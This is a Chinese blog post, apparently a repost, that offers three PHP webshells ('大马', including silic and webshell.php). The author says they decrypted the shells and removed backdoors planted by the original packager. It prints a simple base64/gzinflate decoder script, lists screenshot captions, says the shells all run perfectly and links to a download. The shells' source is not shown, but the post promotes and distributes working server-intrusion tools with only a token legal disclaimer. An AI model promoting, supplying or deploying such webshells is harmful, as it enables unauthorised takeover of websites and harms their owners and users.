三款PHP大马,已解密、去后门

今天无意中找到了三款Php大马,下载下来发现都加密了,不用说,一看就是有后门

但解密特别简单,这里把源码贴出来

 1 <?php
 2 header("Content-type: text/html; charset=utf-8");
 3 
 4 $decode = '这里是加密的字符串';
 5 
 6 $decode = gzinflate(base64_decode($decode));
 7 
 8 $fopen = fopen('out.txt',"wb");
 9 
10 fwrite($fopen,$decode);
11 
12 fclose($fopen);
13 //解密后会放在同目录下的out.txt里面
14 echo "解码成功<a href='out.txt'>点我查看</a>";
15 ?>

然后放点图片

php mof+SHELL前台

php mof+SHELL.php后台

silic前台界面

silic.php 后台界面

webshell.php 前台界面

webshell.php 后台

这几个都可以完美运行

顺便吐槽一下放后门的老兄:加密也得高大上一点吧,直接用gzinflate也太low了吧

下载地址:https://bentokit.lanzous.com/iWZccjae0ud

 各位使用时请遵守法律!

原文地址:https://www.cnblogs.com/bentok/p/14124381.html